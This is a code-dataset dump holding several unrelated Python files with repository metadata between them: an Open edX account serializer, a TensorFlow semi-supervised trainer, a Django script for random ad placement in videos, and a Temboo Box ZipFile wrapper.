),
"email": user.email,
"id": user.id,
# For backwards compatibility: Tables created after the upgrade to Django 1.8 will save microseconds.
# However, mobile apps are not expecting microsecond in the serialized value. If we set it to zero the
# DRF JSONEncoder will not include it in the serialized value.
# https://docs.djangoproject.com/en/1.8/ref/databases/#fractional-seconds-support-for-time-and-datetime-fields
"date_joined": user.date_joined.replace(microsecond=0),
"last_login": user.last_login,
"is_active": user.is_active,
"activation_key": activation_key,
"bio": None,
"country": None,
"state": None,
"profile_image": None,
"language_proficiencies": None,
"name": None,
"gender": None,
"goals": None,
"year_of_birth": None,
"level_of_education": None,
"mailing_address": None,
"requires_parental_consent": None,
"accomplishments_shared": accomplishments_shared,
"account_privacy": self.configuration.get('default_visibility'),
"social_links": None,
"extended_profile_fields": None,
"phone_number": None,
"pending_name_change": None,
"is_verified_name_enabled": is_verified_name_enabled(),
}
if user_profile:
data.update(
{
"bio": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.bio),
"country": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.country.code),
"state": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.state),
"profile_image": AccountLegacyProfileSerializer.get_profile_image(
user_profile, user, self.context.get('request')
),
"language_proficiencies": LanguageProficiencySerializer(
user_profile.language_proficiencies.all().order_by('code'), many=True
).data,
"name": user_profile.name,
"gender": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.gender),
"goals": user_profile.goals,
"year_of_birth": user_profile.year_of_birth,
"level_of_education": AccountLegacyProfileSerializer.convert_empty_to_None(
user_profile.level_of_education
),
"mailing_address": user_profile.mailing_address,
"requires_parental_consent": user_profile.requires_parental_consent(),
"account_privacy": get_profile_visibility(user_profile, user, self.configuration),
"social_links": SocialLinkSerializer(
user_profile.social_links.all().order_by('platform'), many=True
).data,
"extended_profile": get_extended_profile(user_profile),
"phone_number": user_profile.phone_number,
}
)
try:
pending_name_change = PendingNameChange.objects.get(user=user)
data.update({"pending_name_change": pending_name_change.new_name})
except PendingNameChange.DoesNotExist:
pass
if is_secondary_email_feature_enabled():
data.update(
{
"secondary_email": account_recovery.secondary_email if account_recovery else None,
"secondary_email_enabled": True,
}
)
if self.custom_fields:
fields = self.custom_fields
elif user_profile:
fields = _visible_fields(user_profile, user, self.configuration)
else:
fields = self.configuration.get('public_fields')
return self._filter_fields(
fields,
data
)
def _filter_fields(self, field_whitelist, serialized_account):
"""
Filter serialized account Dict to only include whitelisted keys
"""
visible_serialized_account = {}
for field_name in field_whitelist:
visible_serialized_account[field_name] = serialized_account.get(field_name, None)
return visible_serialized_account
class UserAccountDisableHistorySerializer(serializers.ModelSerializer):
"""
Class that serializes User account disable history
"""
created_by = serializers.SerializerMethodField()
class Meta:
model = UserPasswordToggleHistory
fields = ("created", "comment", "disabled", "created_by")
def get_created_by(self, user_password_toggle_history):
return user_password_toggle_history.created_by.username
class AccountUserSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of User model needed for account information.
"""
password_toggle_history = UserAccountDisableHistorySerializer(many=True, required=False)
class Meta:
model = User
fields = ("username", "email", "date_joined", "is_active", "password_toggle_history")
read_only_fields = fields
explicit_read_only_fields = ()
class AccountLegacyProfileSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of UserProfile model needed for account information.
"""
profile_image = serializers.SerializerMethodField("_get_profile_image")
requires_parental_consent = serializers.SerializerMethodField()
language_proficiencies = LanguageProficiencySerializer(many=True, required=False)
social_links = SocialLinkSerializer(many=True, required=False)
phone_number = PhoneNumberSerializer(required=False)
class Meta:
model = UserProfile
fields = (
"name", "gender", "goals", "year_of_birth", "level_of_education", "country", "state", "social_links",
"mailing_address", "bio", "profile_image", "requires_parental_consent", "language_proficiencies",
"phone_number"
)
# Currently no read-only field, but keep this so view code doesn't need to know.
read_only_fields = ()
explicit_read_only_fields = ("profile_image", "requires_parental_consent")
def validate_bio(self, new_bio):
""" Enforce maximum length for bio. """
if len(new_bio) > BIO_MAX_LENGTH:
raise serializers.ValidationError(
f"The about me field must be at most {BIO_MAX_LENGTH} characters long."
)
return new_bio
def validate_name(self, new_name):
""" Enforce minimum length for name. """
if len(new_name) < NAME_MIN_LENGTH:
raise serializers.ValidationError(
f"The name field must be at least {NAME_MIN_LENGTH} character long."
)
return new_name
def validate_language_proficiencies(self, value):
"""
Enforce all languages are unique.
"""
language_proficiencies = [language for language in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_language_proficiencies = {language["code"] for language in language_proficiencies}
if len(language_proficiencies) != len(unique_language_proficiencies):
raise serializers.ValidationError("The language_proficiencies field must consist of unique languages.")
return value
def validate_social_links(self, value):
"""
Enforce only one entry for a particular social platform.
"""
social_links = [social_link for social_link in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_social_links = {social_link["platform"] for social_link in social_links}
if len(social_links) != len(unique_social_links):
raise serializers.ValidationError("The social_links field must consist of unique social platforms.")
return value
def transform_gender(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_country(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_level_of_education(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_bio(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_phone_number(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
@staticmethod
def convert_empty_to_None(value):
"""
Helper method to convert empty string to None (other values pass through).
"""
return None if value == "" else value
@staticmethod
def get_profile_image(user_profile, user, request=None):
"""
Returns metadata about a user's profile image.
"""
data = {'has_image': user_profile.has_profile_image}
urls = get_profile_image_urls_for_user(user, request)
data.update({
f'{PROFILE_IMAGE_KEY_PREFIX}_{size_display_name}': url
for size_display_name, url in urls.items()
})
return data
def get_requires_parental_consent(self, user_profile):
"""
Returns a boolean representing whether the user requires parental controls.
"""
return user_profile.requires_parental_consent()
def _get_profile_image(self, user_profile):
"""
Returns metadata about a user's profile image
This protected method delegates to the static 'get_profile_image' method
because 'serializers.SerializerMethodField("_get_profile_image")' will
call the method with a single argument, the user_profile object.
"""
return AccountLegacyProfileSerializer.get_profile_image(user_profile, user_profile.user)
def _update_social_links(self, instance, requested_social_links):
"""
Update the given profile instance's social links as requested.
"""
try:
new_social_links = []
deleted_social_platforms = []
for requested_link_data in requested_social_links:
requested_platform = requested_link_data['platform']
requested_link_url = requested_link_data['social_link']
validate_social_link(requested_platform, requested_link_url)
formatted_link = format_social_link(requested_platform, requested_link_url)
if not formatted_link:
deleted_social_platforms.append(requested_platform)
else:
new_social_links.append(
SocialLink(user_profile=instance, platform=requested_platform, social_link=formatted_link)
)
platforms_of_new_social_links = [s.platform for s in new_social_links]
current_social_links = list(instance.social_links.all())
unreplaced_social_links = [
social_link for social_link in current_social_links
if social_link.platform not in platforms_of_new_social_links
]
pruned_unreplaced_social_links = [
social_link for social_link in unreplaced_social_links
if social_link.platform not in deleted_social_platforms
]
merged_social_links = new_social_links + pruned_unreplaced_social_links
instance.social_links.all().delete()
instance.social_links.bulk_create(merged_social_links)
except ValueError as err:
# If we have encountered any validation errors, return them to the user.
raise errors.AccountValidationError({
'social_links': {
"developer_message": f"Error when adding new social link: '{str(err)}'",
"user_message": str(err)
}
})
def update(self, instance, validated_data):
"""
Update the profile, including nested fields.
Raises:
errors.AccountValidationError: the update was not attempted because validation errors were found with
the supplied update
"""
language_proficiencies = validated_data.pop("language_proficiencies", None)
# Update all fields on the user profile that are writeable,
# except for "language_proficiencies" and "social_links", which we'll update separately
update_fields = set(self.get_writeable_fields()) - {"language_proficiencies"} - {"social_links"}
for field_name in update_fields:
default = getattr(instance, field_name)
field_value = validated_data.get(field_name, default)
setattr(instance, field_name, field_value)
# Update the related language proficiency
if language_proficiencies is not None:
instance.language_proficiencies.all().delete()
instance.language_proficiencies.bulk_create([
LanguageProficiency(user_profile=instance, code=language["code"])
for language in language_proficiencies
])
# Update the user's social links
requested_social_links = self._kwargs['data'].get('social_links') # lint-amnesty, pylint: disable=no-member
if requested_social_links:
self._update_social_links(instance, requested_social_links)
instance.save()
return instance
class RetirementUserProfileSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of UserProfile data for use in RetirementStatus APIs
"""
class Meta:
model = UserProfile
fields = ('id', 'name')
class RetirementUserSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of User data for use in RetirementStatus APIs
"""
profile = RetirementUserProfileSerializer(read_only=True)
class Meta:
model = User
fields = ('id', 'username', 'email', 'profile')
class RetirementStateSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of RetirementState data for use in RetirementStatus APIs
"""
class Meta:
model = RetirementState
fields = ('id', 'state_name', 'state_execution_order')
class UserRetirementStatusSerializer(serializers.ModelSerializer):
"""
Perform serialization for the RetirementStatus model
"""
user = RetirementUserSerializer(read_only=True)
current_state = RetirementStateSerializer(read_only=True)
last_state = RetirementStateSerializer(read_only=True)
class Meta:
model = UserRetirementStatus
exclude = ['responses', ]
class UserSearchEmailSerializer(serializers.ModelSerializer):
"""
Perform serialization for the User model used in accounts/search_emails endpoint.
"""
class Meta:
model = User
fields = ('email', 'id', 'username')
class UserRetirementPartnerReportSerializer(serializers.Serializer):
"""
Perform serialization for the UserRetirementPartnerReportingStatus model
"""
user_id = serializers.IntegerField()
student_id = serializers.CharField(required=False)
original_username = serializers.CharField()
original_email = serializers.EmailField()
original_name = serializers.CharField()
orgs = serializers.ListField(child=serializers.CharField())
orgs_config = serializers.ListField(required=False)
created = serializers.DateTimeField()
# Required overrides of abstract base class methods, but we don't use them
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
class PendingNameChangeSerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Serialize the PendingNameChange model
"""
new_name = serializers.CharField()
class Meta:
model = PendingNameChange
fields = ('new_name',)
def validate_new_name(self, new_name):
if contains_html(new_name):
raise serializers.ValidationError('Name cannot contain the following characters: < >')
if contains_url(new_name):
raise serializers.ValidationError('Name cannot contain a URL')
def get_extended_profile(user_profile):
"""
Returns the extended user profile fields stored in user_profile.meta
"""
# pick the keys from the site configuration
extended_profile_field_names = configuration_helpers.get_value('extended_profile_fields', [])
try:
extended_profile_fields_data = json.loads(user_profile.meta)
except ValueError:
extended_profile_fields_data = {}
extended_profile = []
for field_name in extended_profile_field_names:
extended_profile.append({
"field_name": field_name,
"field_value": extended_profile_fields_data.get(field_name, "")
})
return extended_profile
def get_profile_visibility(user_profile, user, configuration):
"""
Returns the visibility level for the specified user profile.
"""
if user_profile.requires_parental_consent():
return PRIVATE_VISIBILITY
# Calling UserPreference directly because the requesting user may be different from existing_user
# (and does not have to be is_staff).
profile_privacy = UserPreference.get_value(user, ACCOUNT_VISIBILITY_PREF_KEY)
if profile_privacy:
return profile_privacy
else:
return configuration.get('default_visibility')
def _visible_fields(user_profile, user, configuration=None):
"""
Return what fields should be visible based on user's preferences
:param user_profile: User profile object
:param user: User object
:param configuration: A visibility configuration dictionary.
:return: whitelist List of fields to be shown
"""
if not configuration:
configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
profile_visibility = get_profile_visibility(user_profile, user, configuration)
if profile_visibility == ALL_USERS_VISIBILITY:
return configuration.get('bulk_shareable_fields')
elif profile_visibility == CUSTOM_VISIBILITY:
return _visible_fields_from_custom_preferences(user, configuration)
else:
return configuration.get('public_fields')
def _visible_fields_from_custom_preferences(user, configuration):
"""
Returns all fields that are marked to be shared with other users in the
given user's preferences. Includes fields that are always public.
"""
preferences = UserPreference.get_all_preferences(user)
fields_shared_with_all_users = [
field_name for field_name in configuration.get('custom_shareable_fields')
if preferences.get(f'{VISIBILITY_PREFIX}{field_name}') == 'all_users'
]
return set(fields_shared_with_all_users + configuration.get('public_fields'))
| 0
| 613
| 0
| 19,924
| 0
| 0
| 0
| 706
| 684
|
c14b091cf5862855f63fbbe263409ba8262d2632
| 12,598
|
py
|
Python
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 61
|
2019-06-06T19:22:14.000Z
|
2022-03-24T01:38:59.000Z
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 3
|
2019-07-22T14:24:55.000Z
|
2020-09-30T09:15:34.000Z
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 10
|
2019-06-06T18:41:27.000Z
|
2022-03-24T01:39:13.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018, Konstantinos Kamnitsas
#
# This program is free software; you can redistribute and/or modify
# it under the terms of the Apache License, Version 2.0. See the
# accompanying LICENSE file or read the terms at:
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import absolute_import, division, print_function
import logging
LOG = logging.getLogger('main')
| 54.301724
| 230
| 0.656057
|
#!/usr/bin/env python
# Copyright (c) 2018, Konstantinos Kamnitsas
#
# This program is free software; you can redistribute and/or modify
# it under the terms of the Apache License, Version 2.0. See the
# accompanying LICENSE file or read the terms at:
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import absolute_import, division, print_function
import logging
LOG = logging.getLogger('main')
import tensorflow as tf
from cclp.routines.schedules.schedules import apply_growth
from cclp.neuralnet.trainers import losses
class Trainer(object):
# A class separate than the model, to keep separately the optimization state.
def __init__(self, params, net_model, t_sup_labels):
self._params = params # A dictionary or dictionary-like ConfigFlags.
self._ema = tf.train.ExponentialMovingAverage(decay=0.99)
self._loss_total_weighted = self._setup_losses( net_model, t_sup_labels )
self._t_learning_rate = self._get_t_learning_rate( net_model ) # Can be returning scalar or tensor (eg from schedule).
self._train_op = self._create_train_op()
self._increase_model_step_op = tf.assign( net_model.get_t_step(), net_model.get_t_step() + 1)
tf.summary.scalar( 'Loss_Total_weighted', self._loss_total_weighted )
tf.summary.scalar( 'Learning_Rate', self._t_learning_rate )
def _setup_losses(self, net_model, t_sup_labels):
# net_model: Instance of ./cclp/neuralnet/models/classifier/Classifier.
losses.add_softmax_cross_entr( logits = net_model.tensor_families["train_sup"]["logits_tens"],
lbls = t_sup_labels,
weight = self._params["logit_weight"] )
if self._params["cc_loss_on"]:
losses.add_cclp_loss(
Z_l = net_model.tensor_families["train_sup"]["emb_z_tens"],
Z_u = net_model.tensor_families["train_unsup"]["emb_z_tens"],
y_l_lbls = t_sup_labels,
c_classes = net_model.get_num_classes(),
# Params for creating the graph
sim_metric = self._params["cc_sim_metric"],
l2_sigmas = self._params["cc_l2_sigmas_init"],
l2_sigmas_trainable = self._params["cc_l2_sigmas_trainable"],
# Params for CCLP loss
cclp_weight = self._params["cc_weight"],
cclp_steps = self._params["cc_steps"],
sum_over_chains = self._params["cc_sum_over_chains"],
# Others
e_smooth = self._params["cc_e_smooth"],
optim_smooth_mtx = self._params["cc_optim_smooth_mtx"] )
loss_total_weighted = tf.losses.get_total_loss(add_regularization_losses=True) # tf keeps track of everything. Losses registered eg in add_logit_loss and L2 are here.
return loss_total_weighted
def _get_t_learning_rate(self, net_model):
# Set up learning rate
if self._params["lr_sched_type"] == 'expon_decay':
t_learning_rate = tf.maximum( tf.train.exponential_decay( self._params["lr_expon_init"], net_model.get_t_step(), self._params["lr_expon_decay_steps"], self._params["lr_expon_decay_factor"], staircase=True),
self._params["lr_min_value"])
elif self._params["lr_sched_type"] == 'piecewise':
# In github it was said that piecewise was used for svhn.
t_learning_rate = tf.maximum( tf.train.piecewise_constant( net_model.get_t_step(), boundaries = [ tf.cast(v, tf.int32) for v in self._params["lr_piecewise_boundaries"] ], values = self._params["lr_piecewise_values"] ),
self._params["lr_min_value"])
return t_learning_rate
def _get_grads_after_calc_grads_and_g_to_v_per_loss(self, list_of_trainable_vars):
# Get all losses
list_of_all_added_losses = tf.losses.get_losses() # THIS DOES NOT INCLUDE REGULARIZATION LOSSES!
# ... See last line: https://github.com/tensorflow/tensorflow/blob/r1.5/tensorflow/python/ops/losses/util.py
list_of_all_added_losses += tf.get_collection( tf.GraphKeys.REGULARIZATION_LOSSES ) # This is where L2 is placed.
LOG.debug("list_of_all_added_losses = " + str(list_of_all_added_losses) )
LOG.debug("tf.get_collection( tf.GraphKeys.REGULARIZATION_LOSSES ) = " + str(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)) )
list_of_grads_for_each_var_per_loss = [] # will be of shape NumLosses x numVars
for loss in list_of_all_added_losses:
LOG.info('Computing grads of each var wrt Loss: '+loss.name )
grads_for_this_loss = tf.gradients( loss, list_of_trainable_vars )
list_of_grads_for_each_var_per_loss.append( grads_for_this_loss )
# Now that you have for each variable, the gradients from the different losses separately, compute the ratios to the variable's value, and an ema to report.
list_of_loss_names_to_print_ratios = ['loss_logit_weighted', 'loss_LP_unl_entr_weighted', 'loss_hop0_weighted',
'loss_hop1_weighted', 'loss_hop2_weighted', 'loss_hop3_weighted', 'loss_hop4_weighted', 'loss_hop5_weighted',
'loss_hopNeg0_weighted' ]
list_of_ema_update_ops = []
for loss_i in range( len(list_of_all_added_losses) ) :
this_loss_name = list_of_all_added_losses[loss_i].name
if any( [ this_loss_name.startswith( name_of_interest ) for name_of_interest in list_of_loss_names_to_print_ratios ] ):
LOG.debug('LOSS FOUND! this_loss_name='+this_loss_name)
grads_for_this_loss = list_of_grads_for_each_var_per_loss[loss_i]
sum_of_all_pow2_grads = 0
sum_of_all_pow2_vars = 0
for grad, var in zip( grads_for_this_loss, list_of_trainable_vars ):
# Each "grad" is of different shape. eg a tensor of shape [3,3,32,32] for conv, or [3] for bias, etc. So I need to treat them carefully.
# Same for Variables tensors.
if grad is None:
continue # eg in the case that a var does not depend on a loss. eg classif layer to auxiliary losses.
sum_of_all_pow2_grads += tf.reduce_sum( tf.pow(grad, 2) )
sum_of_all_pow2_vars += tf.reduce_sum( tf.pow(var, 2) )
norm_grads = tf.sqrt( sum_of_all_pow2_grads )
norm_vars = tf.sqrt( sum_of_all_pow2_vars )
ratio_g_to_v = norm_grads / norm_vars
# Maintain and report a moving average for each ratio:
list_of_ema_update_ops.append( self._ema.apply([ratio_g_to_v]) )
ema_ratio_g_to_v = self._ema.average( ratio_g_to_v )
tf.summary.scalar('RatioGtoV_'+this_loss_name, ema_ratio_g_to_v)
# Add up the gradients from each different loss into one total gradient for each variable, that the optimizer will then apply
grads_total_for_each_var = None
for grads_wrt_specific_loss in list_of_grads_for_each_var_per_loss:
if grads_total_for_each_var is None:
grads_total_for_each_var = grads_wrt_specific_loss
else:
assert len(grads_total_for_each_var) == len(grads_wrt_specific_loss)
num_var_n_grad_tensors = len(grads_total_for_each_var)
for grad_i in range( num_var_n_grad_tensors ):
if grads_wrt_specific_loss[grad_i] is None:
continue # eg if a loss does not depend on a variable. Eg, LP losses wrt classification layer.
elif grads_total_for_each_var[grad_i] is None: # eg if the corresponding variable was independent of the very first loss.
grads_total_for_each_var[grad_i] = grads_wrt_specific_loss[grad_i]
else:
grads_total_for_each_var[grad_i] = grads_total_for_each_var[grad_i] + grads_wrt_specific_loss[grad_i]
return grads_total_for_each_var, list_of_ema_update_ops
def _create_train_op(self):
list_of_optimizers = []
list_of_trainable_var_collections = []
list_of_train_ops = []
"""
LOG.debug("***** Are we correctly getting update ops of BN? *****" )
LOG.debug("tf.get_collection(tf.GraphKeys.UPDATE_OPS)=" + str( tf.get_collection(tf.GraphKeys.UPDATE_OPS) ) )
LOG.debug("len( tf.get_collection(tf.GraphKeys.UPDATE_OPS) ) = " + str( len(tf.get_collection(tf.GraphKeys.UPDATE_OPS)) ) )
for thing in tf.get_collection(tf.GraphKeys.UPDATE_OPS):
LOG.debug( "thing = " + str(thing) )
"""
# Make main op, training all the tf.GraphKeys.TRAINABLE_VARIABLES. All separately trained are in different collections.
trainable_vars_main = tf.get_collection( tf.GraphKeys.TRAINABLE_VARIABLES )
list_of_trainable_var_collections.append( trainable_vars_main ) # concatente all trainable vars in a list/collection.
optimizer_main = tf.train.AdamOptimizer( self._t_learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-07 )
#optimizer_main = tf.train.RMSPropOptimizer( self._t_learning_rate, decay=0.9, momentum=0.6, epsilon=1e-8 )
#optimizer_main = tf.train.MomentumOptimizer( self._t_learning_rate, momentum=0.9, use_nesterov=True )
list_of_optimizers.append( optimizer_main )
if self._params["cc_loss_on"] and self._params["cc_sim_metric"] == "L2" and self._params['cc_l2_sigmas_trainable']:
trainable_lp_l2_sigmas = tf.get_collection( 'TRAINABLE_LP_L2_SIGMAS' )
list_of_trainable_var_collections.append( trainable_lp_l2_sigmas )
optimizer_sigmas = tf.train.AdamOptimizer( self._t_learning_rate * self._params['cc_l2_sigmas_lr_multipl'] )
list_of_optimizers.append( optimizer_sigmas )
# Add more "special" trainable var collections here if needed...
# Get all trainable vars in one list
list_of_trainable_vars = [ var for sublist in list_of_trainable_var_collections for var in sublist ]
if self._params["track_ratio_g_v"] :
LOG.debug("Going to calculate grads per loss separately, to track ratio of grads/var. Slow." )
# grads_total_for_each_var: total gradient for each variable. shape: number of variables.
# list_of_ema_update_ops: one for each tracked loss in list_of_loss_names_to_print_ratios
grads_total_for_each_var, list_of_ema_update_ops = self._get_grads_after_calc_grads_and_g_to_v_per_loss(list_of_trainable_vars)
else :
LOG.debug("Not tracking grads/var. Calc grad from total_loss." )
grads_total_for_each_var = tf.gradients( self._loss_total_weighted, list_of_trainable_vars )
list_of_ema_update_ops = []
# Now lets apply the grads to the parameters, with the appropriate optimiser / learningRate.
low_counter = 0
for i in range( len(list_of_trainable_var_collections) ) :
var_collection = list_of_trainable_var_collections[i]
high_counter = low_counter+len(var_collection)
grads_for_this_var_collection = grads_total_for_each_var[ low_counter: high_counter ]
optimizer = list_of_optimizers[i]
train_op = optimizer.apply_gradients( zip(grads_for_this_var_collection, var_collection) )
list_of_train_ops.append(train_op)
low_counter = high_counter
all_ops_to_run_at_one_train_step = list_of_train_ops
all_ops_to_run_at_one_train_step += list_of_ema_update_ops
all_ops_to_run_at_one_train_step += tf.get_collection(tf.GraphKeys.UPDATE_OPS) # This one keeps updates of Batch normalization.
total_train_op = tf.group( *all_ops_to_run_at_one_train_step )
return total_train_op
def get_train_op(self):
return self._train_op
def get_increase_model_step_op(self):
return self._increase_model_step_op
| 0
| 0
| 0
| 12,018
| 0
| 0
| 0
| 60
| 91
|
69e1c7f030fdae6cc022477307bb6b668d3bc021
| 2,726
|
py
|
Python
|
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
#import util_preparation as up
PREVENT_DURATION = 60
START_PREVENT_DURATION = 120
END_PREVENT_DURATION = 120
| 29.956044
| 100
| 0.573001
|
#import util_preparation as up
import pandas as pd
import random
import os
import csv
from .models import *
PREVENT_DURATION = 60
START_PREVENT_DURATION = 120
END_PREVENT_DURATION = 120
def generagte_random_ads(video_id,N_ADS=3):
# 确定插入的广告
# 可用广告在 ad_urls.csv 里查询
ads = []
ads = [[ad.ad_id, ad.href, ad.src] for ad in Ad.objects.all() if ad.ad_id != 1]
# reader = csv.reader(open(r"/home/www/res/ad/ad_urls.csv", "r",encoding="utf8"))
# for item in reader:
# ad_id = int(item[0])
# ad_url = item[1]
# ads.append([ad_id, ad_url])
# 随机取 N_ADS 个
ads = random.sample(ads, N_ADS)
# 确定插入时间
# 遍历全部_shot.csv,找到当前视频的对应 _shot.csv
available_times = []
available_local_shot_ids = []
for path,dir_list,file_list in os.walk(r"/home/www/res/video_shot_csv"):
for file_name in file_list:
id = int(file_name.split("/")[-1].split("_")[0].replace("video",""))
video = Video.objects.get(video_id=video_id)
v_length = video.length
shots:Shot = Shot.objects.filter(video=video)
for shot in shots:
#start_time = float(item[START_TIME_COL])
end_time = shot.end_time
# 每一个镜头的结束时间可以作为候选时间点
# 离开头和结尾过近(END_PREVENT_DURATION)的时间点自动剔除
if end_time > START_PREVENT_DURATION and end_time < v_length - END_PREVENT_DURATION:
available_times.append(end_time)
available_local_shot_ids.append(shot.local_shot_id)
def randomize_time():
ad_times = random.sample(available_times, N_ADS)
ad_times.sort()
for i in range(0,N_ADS):
if (i-1)>0:
if abs(ad_times[i] - ad_times[i-1]) < PREVENT_DURATION:
ad_times = randomize_time()
break
if (i+1)<len(ad_times):
if abs(ad_times[i] - ad_times[i+1]) < PREVENT_DURATION:
ad_times = randomize_time()
break
return ad_times
if len(available_times) > N_ADS:
ad_times = randomize_time()
#print(ad_times)
else:
#print("ERROR: len(available_times) <= N_ADS")
return []
local_shot_ids = []
for time in ad_times:
local_shot_ids.append(available_local_shot_ids[available_times.index(time)])
# print(ad_times)
result = []
for i in range(0, N_ADS):
result.append({
"ad_id":ads[i][0],
"time":ad_times[i],
"local_shot_id":local_shot_ids[i],
"href":ads[i][1],
"src":ads[i][2]
})
#print(result)
return result
| 222
| 0
| 0
| 0
| 0
| 2,440
| 0
| -33
| 134
|
5f7d6c5925fe4e52b86831fe3e20e0cbb51570a3
| 4,646
|
py
|
Python
|
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ZipFile
# Creates a zipped version of the specified Box file and returns a link to the new compressed file.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
| 40.754386
| 206
| 0.674774
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ZipFile
# Creates a zipped version of the specified Box file and returns a link to the new compressed file.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ZipFile(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ZipFile Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ZipFile, self).__init__(temboo_session, '/Library/Box/Files/ZipFile')
def new_input_set(self):
return ZipFileInputSet()
def _make_result_set(self, result, path):
return ZipFileResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ZipFileChoreographyExecution(session, exec_id, path)
class ZipFileInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ZipFile
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
super(ZipFileInputSet, self)._set_input('AccessToken', value)
def set_AsUser(self, value):
"""
Set the value of the AsUser input for this Choreo. ((optional, string) The ID of the user. Only used for enterprise administrators to make API calls for their managed users.)
"""
super(ZipFileInputSet, self)._set_input('AsUser', value)
def set_FileID(self, value):
"""
Set the value of the FileID input for this Choreo. ((required, string) The id of the file to zip.)
"""
super(ZipFileInputSet, self)._set_input('FileID', value)
def set_SharedLink(self, value):
"""
Set the value of the SharedLink input for this Choreo. ((conditional, json) A JSON object representing the item?s shared link and associated permissions. See documentation for formatting examples.)
"""
super(ZipFileInputSet, self)._set_input('SharedLink', value)
def set_ZipFileLocation(self, value):
"""
Set the value of the ZipFileLocation input for this Choreo. ((conditional, string) The id of the folder to put the new zip file in. When not specified, the zip file will be put in the root folder.)
"""
